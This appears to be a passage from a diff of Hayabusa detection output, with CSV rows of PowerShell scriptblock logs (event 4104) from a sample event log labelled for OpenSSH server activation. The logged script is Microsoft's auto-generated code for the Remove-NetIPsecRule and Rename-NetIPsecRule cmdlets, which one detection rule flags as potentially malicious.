[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains 